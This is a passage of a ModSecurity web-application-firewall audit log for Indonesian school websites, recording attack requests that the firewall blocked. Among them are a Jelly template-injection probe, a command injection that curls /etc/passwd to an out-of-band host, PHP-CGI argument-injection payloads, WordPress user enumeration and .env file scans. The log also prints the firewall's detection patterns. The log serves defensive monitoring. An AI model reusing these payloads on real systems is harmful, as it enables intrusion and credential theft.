X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --28a75554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a75554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749155244412670 804 (- - -) Stopwatch2: 1749155244412670 804; combined=314, p1=274, p2=0, p3=0, p4=0, p5=39, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a75554-Z-- --f241ec42-A-- [06/Jun/2025:03:39:49 +0700] aEIAlSrHpfaS2Cuwh8UOwAAAAEg 103.236.140.4 46808 103.236.140.4 8181 --f241ec42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173412266 --f241ec42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f241ec42-E-- --f241ec42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749155989689643 2821 (- - -) Stopwatch2: 1749155989689643 2821; combined=1083, p1=435, p2=615, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f241ec42-Z-- --05687329-A-- [06/Jun/2025:03:39:50 +0700] aEIAlirHpfaS2Cuwh8UOwQAAAEo 103.236.140.4 46808 103.236.140.4 8181 --05687329-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 192 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235672 --05687329-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0us2vpgpeonc6qdbef0gcj955w9nyntj.oast.me) --05687329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05687329-E-- --05687329-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749155990684513 2050 (- - -) Stopwatch2: 1749155990684513 2050; combined=648, p1=394, p2=225, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05687329-Z-- --b1b7bd24-A-- [06/Jun/2025:03:47:46 +0700] aEICcmaFzeU7VUj_TDFzcAAAAAU 103.236.140.4 47120 103.236.140.4 8181 --b1b7bd24-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173412446 --b1b7bd24-C-- --b1b7bd24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b7bd24-E-- --b1b7bd24-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749156466360087 5545 (- - -) Stopwatch2: 1749156466360087 5545; combined=2909, p1=740, p2=2136, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b7bd24-Z-- --e8985941-A-- [06/Jun/2025:03:47:47 +0700] aEICc2aFzeU7VUj_TDFzcQAAAAY 103.236.140.4 47124 103.236.140.4 8181 --e8985941-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235860 --e8985941-C-- --e8985941-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8985941-E-- --e8985941-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749156467687929 3557 (- - -) Stopwatch2: 1749156467687929 3557; combined=1809, p1=458, p2=1325, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8985941-Z-- --f335a36e-A-- [06/Jun/2025:03:47:48 +0700] aEICdGaFzeU7VUj_TDFzcgAAAAc 103.236.140.4 47128 103.236.140.4 8181 --f335a36e-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173412449 --f335a36e-C-- --f335a36e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f335a36e-E-- --f335a36e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749156468688318 2822 (- - -) Stopwatch2: 1749156468688318 2822; combined=1508, p1=337, p2=1147, p3=0, p4=0, p5=23, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f335a36e-Z-- --f49e7e50-A-- [06/Jun/2025:03:47:49 +0700] aEICdWaFzeU7VUj_TDFzcwAAAAg 103.236.140.4 47132 103.236.140.4 8181 --f49e7e50-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235863 --f49e7e50-C-- --f49e7e50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f49e7e50-E-- --f49e7e50-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749156469691936 3335 (- - -) Stopwatch2: 1749156469691936 3335; combined=1843, p1=433, p2=1383, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f49e7e50-Z-- --9f81301f-A-- [06/Jun/2025:03:59:55 +0700] aEIFS9KrQJH3faNNWWAWfAAAAM4 103.236.140.4 47212 103.236.140.4 8181 --9f81301f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.24.62.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.24.62.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f81301f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f81301f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749157195595115 3606 (- - -) Stopwatch2: 1749157195595115 3606; combined=1451, p1=494, p2=927, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f81301f-Z-- --38e09b3f-A-- [06/Jun/2025:04:09:27 +0700] aEIHh2aFzeU7VUj_TDFzhwAAAA4 103.236.140.4 47358 103.236.140.4 8181 --38e09b3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.145.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.145.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --38e09b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38e09b3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749157767545456 3240 (- - -) Stopwatch2: 1749157767545456 3240; combined=1370, p1=488, p2=848, p3=0, p4=0, p5=34, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38e09b3f-Z-- --e0024c76-A-- [06/Jun/2025:04:14:29 +0700] aEIItWaFzeU7VUj_TDFziQAAABA 103.236.140.4 47362 103.236.140.4 8181 --e0024c76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e0024c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0024c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749158069554076 2938 (- - -) Stopwatch2: 1749158069554076 2938; combined=1158, p1=390, p2=744, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0024c76-Z-- --e30e1b7c-A-- [06/Jun/2025:04:15:06 +0700] aEII2tKrQJH3faNNWWAWsAAAANU 103.236.140.4 47364 103.236.140.4 8181 --e30e1b7c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept-Charset: utf-8 --e30e1b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e30e1b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158106182286 803 (- - -) Stopwatch2: 1749158106182286 803; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e30e1b7c-Z-- --d8f9021e-A-- [06/Jun/2025:04:16:44 +0700] aEIJPGaFzeU7VUj_TDFzjAAAABQ 103.236.140.4 47372 103.236.140.4 8181 --d8f9021e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de) Accept-Charset: utf-8 --d8f9021e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f9021e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158204105830 883 (- - -) Stopwatch2: 1749158204105830 883; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f9021e-Z-- --5b447873-A-- [06/Jun/2025:04:16:47 +0700] aEIJP2aFzeU7VUj_TDFzjQAAABU 103.236.140.4 47374 103.236.140.4 8181 --5b447873-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Accept-Charset: utf-8 --5b447873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b447873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158207332465 645 (- - -) Stopwatch2: 1749158207332465 645; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b447873-Z-- --1e9afb22-A-- [06/Jun/2025:04:17:22 +0700] aEIJYmaFzeU7VUj_TDFzjgAAABY 103.236.140.4 47376 103.236.140.4 8181 --1e9afb22-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Charset: utf-8 --1e9afb22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e9afb22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158242817877 879 (- - -) Stopwatch2: 1749158242817877 879; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e9afb22-Z-- --2eea3e31-A-- [06/Jun/2025:04:18:10 +0700] aEIJktKrQJH3faNNWWAWsgAAANg 103.236.140.4 47378 103.236.140.4 8181 --2eea3e31-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --2eea3e31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eea3e31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158290672093 922 (- - -) Stopwatch2: 1749158290672093 922; combined=385, p1=348, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eea3e31-Z-- --0a057637-A-- [06/Jun/2025:04:32:16 +0700] aEIM4GaFzeU7VUj_TDFzmgAAABM 103.236.140.4 47418 103.236.140.4 8181 --0a057637-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept-Charset: utf-8 --0a057637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a057637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749159136683987 907 (- - -) Stopwatch2: 1749159136683987 907; combined=402, 